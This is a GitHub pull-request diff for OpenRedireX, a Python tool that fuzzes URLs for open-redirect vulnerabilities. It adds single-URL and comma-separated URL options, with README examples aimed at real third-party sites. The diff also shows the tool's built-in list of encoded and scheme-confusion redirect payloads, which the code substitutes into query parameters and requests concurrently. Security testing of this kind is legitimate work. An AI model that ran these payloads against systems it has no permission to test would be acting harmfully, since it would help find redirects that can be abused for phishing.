Skip to content
Open
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
13 changes: 11 additions & 2 deletions README.md
Original file line number Diff line number Diff line change
Expand Up @@ -36,10 +36,19 @@ openredirex [-p payloads] [-k keyword] [-c concurrency]
- `-p`, `--payloads`: File containing a list of payloads. If not specified, a hardcoded list is used.
- `-k`, `--keyword`: Keyword in URLs to replace with payload. Default is "FUZZ".
- `-c`, `--concurrency`: Number of concurrent tasks. Default is 100.

- `-u`, `--url`: Single URL to test.
example:
```
python3 openredirex.py -u "https://app.productboard.com/?redirect_to=https://nanoporetech.productboard.com" -p payloads.txt
```
- `-Uu`, `--urls`: Comma-separated list of URLs to test.
example:
```
python3 openredirex.py -Uu "https://app.productboard.com/?redirect_to=https://nanoporetech.productboard.com","https://example.com/?ref=https://ankara.com" -p payloads.txt
```
The script expects a list of URLs as input. Each URL should contain the keyword specified by the `-k` option. The script replaces the keyword with each of the payloads, and attempts to fetch the modified URL.

Example usage:
Example usage 2:

```sh
cat list_of_urls.txt | openredirex -p payloads.txt -k "FUZZ" -c 50
Expand Down
97 changes: 23 additions & 74 deletions openredirex.py
Original file line number Diff line number Diff line change
Expand Up @@ -7,9 +7,8 @@
import socket
from aiohttp import ClientConnectorError, ClientOSError, ServerDisconnectedError, ServerTimeoutError, ServerConnectionError, TooManyRedirects
from tqdm import tqdm
import concurrent.futures
from urllib.parse import urlparse, parse_qsl, urlencode, urlunparse
from typing import List
from typing import List, Optional


# Color constants
Expand All @@ -18,115 +17,55 @@
ENDC = '\033[0m' # Reset to default color

# Built-in open-redirect payloads used when no payload file is supplied
# (see load_payloads). "example.com" is the attacker-controlled host that
# a vulnerable target would redirect to; "google.com" variants probe
# userinfo/scheme-confusion tricks.
redirect_payloads = [
    "//example.com@google.com/%2f..",
    "///google.com/%2f..",
    "///example.com@google.com/%2f..",
    "////google.com/%2f..",
    "https://google.com/%2f..",
    "https://example.com@google.com/%2f..",
    "/https://google.com/%2f..",
    "/https://example.com@google.com/%2f..",
    "//google.com/%2f%2e%2e",
    "//example.com@google.com/%2f%2e%2e",
    "///google.com/%2f%2e%2e",
    "///example.com@google.com/%2f%2e%2e",
    "////google.com/%2f%2e%2e",
    "/http://example.com",
    "/http:/example.com",
    "/https:/%5cexample.com/",
    "/https://%09/example.com",
    "/https://%5cexample.com",
    "/https:///example.com/%2e%2e",
    "/https:///example.com/%2f%2e%2e",
    "/https://example.com",
    "/https://example.com/",
    "/https://example.com/%2e%2e",
    "/https://example.com/%2e%2e%2f",
    "/https://example.com/%2f%2e%2e",
    "/https://example.com/%2f..",
    "/https://example.com//",
    "/https:example.com",
    "/%09/example.com",
    "/%2f%2fexample.com",
    "/%2f%5c%2f%67%6f%6f%67%6c%65%2e%63%6f%6d/",
    "/%5cexample.com",
    "/%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d",
    "/.example.com",
    "//%09/example.com",
    "//%5cexample.com",
    "///%09/example.com",
    "///%5cexample.com",
    "////%09/example.com",
    "////%5cexample.com",
    "/////example.com",
    "/////example.com/",
    "////\;@example.com",
    "////example.com/",
]

async def load_payloads(payloads_file: Optional[str]) -> List[str]:
    """Return the list of redirect payloads to try.

    If *payloads_file* is given, read one payload per line (stripped of
    surrounding whitespace); otherwise fall back to the hardcoded
    ``redirect_payloads`` list.
    """
    if payloads_file:
        with open(payloads_file) as f:
            return [line.strip() for line in f]
    return redirect_payloads  # Return hardcoded list if no file specified

def fuzzify_url(url: str, keyword: str) -> str:
    """Return *url* with every query-parameter value replaced by *keyword*.

    If *keyword* already appears anywhere in the URL, the URL is assumed to
    be pre-marked by the user and is returned unchanged.
    """
    if keyword in url:
        return url

    # Otherwise, replace all parameter values with the keyword; keys, path,
    # scheme and fragment are preserved.
    parsed_url = urlparse(url)
    params = parse_qsl(parsed_url.query)
    fuzzed_params = [(k, keyword) for k, _ in params]
    fuzzed_query = urlencode(fuzzed_params)

    return urlunparse(
        [parsed_url.scheme, parsed_url.netloc, parsed_url.path,
         parsed_url.params, fuzzed_query, parsed_url.fragment])


def load_urls() -> List[str]:
    """Read URLs from stdin, one per line, fuzzifying each with "FUZZ".

    Each line is stripped and passed through ``fuzzify_url`` so that every
    query-parameter value becomes the FUZZ marker (unless already present).
    """
    return [fuzzify_url(line.strip(), "FUZZ") for line in sys.stdin]



async def fetch_url(session: aiohttp.ClientSession, url: str):
    """HEAD-request *url*, following redirects; return the response.

    Returns ``None`` (after logging to stderr) on any of the expected
    network/decoding failures. A 10-second total timeout is applied.
    """
    try:
        async with session.head(url, allow_redirects=True, timeout=10) as response:
            return response
    except (ClientConnectorError, ClientOSError, ServerDisconnectedError, ServerTimeoutError, ServerConnectionError, TooManyRedirects, UnicodeDecodeError, socket.gaierror, asyncio.exceptions.TimeoutError) as e:
        # tqdm.write keeps the error message from mangling the progress bar.
        tqdm.write(f'[ERROR] Error fetching {url}: {e}', file=sys.stderr)
        return None

async def process_url(semaphore: asyncio.Semaphore, session: aiohttp.ClientSession, url: str, payloads: List[str], keyword: str, pbar: tqdm):
    """Try every payload against *url* and report URLs that redirect.

    For each payload, *keyword* in *url* is replaced by the payload and the
    result fetched; any response with a redirect history is printed (green
    when the chain has more than one hop). *pbar* is advanced once per
    payload attempted.
    """
    async with semaphore:  # bound overall concurrency
        for payload in payloads:
            filled_url = url.replace(keyword, payload)
            response = await fetch_url(session, filled_url)
            if response and response.history:
                locations = " --> ".join(str(r.url) for r in response.history)
                # If the string contains "-->", print in green
                if "-->" in locations:
                    tqdm.write(f'{DARK_GREEN}[FOUND]{ENDC} {LIGHT_GREEN}{filled_url} redirects to {locations}{ENDC}')
                else:
                    tqdm.write(f'[INFO] {filled_url} redirects to {locations}')
            pbar.update()

async def process_urls(semaphore: asyncio.Semaphore, session: aiohttp.ClientSession, urls: List[str], payloads: List[str], keyword: str):
    """Fuzz every URL with every payload, showing one shared progress bar.

    One ``process_url`` task is created per URL; ``return_exceptions=True``
    keeps a single failing task from cancelling the rest of the run.
    """
    with tqdm(total=len(urls) * len(payloads), ncols=70, desc='Processing', unit='url', position=0) as pbar:
        tasks = [process_url(semaphore, session, url, payloads, keyword, pbar) for url in urls]
        await asyncio.gather(*tasks, return_exceptions=True)

async def main(args):
Expand All @@ -150,9 +89,19 @@ async def main(args):
print(banner)
parser = argparse.ArgumentParser(description="OpenRedireX : A fuzzer for detecting open redirect vulnerabilities")
parser.add_argument('-p', '--payloads', help='file of payloads', required=False)
parser.add_argument('-k', '--keyword', help='keyword in urls to replace with payload (default is FUZZ)', default="FUZZ")
parser.add_argument('-k', '--keyword', help='keyword in URLs to replace with payload (default is FUZZ)', default="FUZZ")
parser.add_argument('-c', '--concurrency', help='number of concurrent tasks (default is 100)', type=int, default=100)
parser.add_argument('-u', '--url', help='single URL to test')
parser.add_argument('-Uu', '--urls', help='comma-separated URLs')
args = parser.parse_args()

if args.url and args.urls:
parser.error("Cannot specify both --url and --urls")
if args.url:
sys.stdin = [args.url]
elif args.urls:
sys.stdin = args.urls.split(',')

try:
asyncio.run(main(args))
except KeyboardInterrupt:
Expand Down
1 change: 0 additions & 1 deletion setup.sh
Original file line number Diff line number Diff line change
Expand Up @@ -3,7 +3,6 @@
# Rename the openredirex.py file to openredirex
mv openredirex.py openredirex


# Move the openredirex file to /usr/local/bin
sudo mv openredirex /usr/local/bin/

Expand Down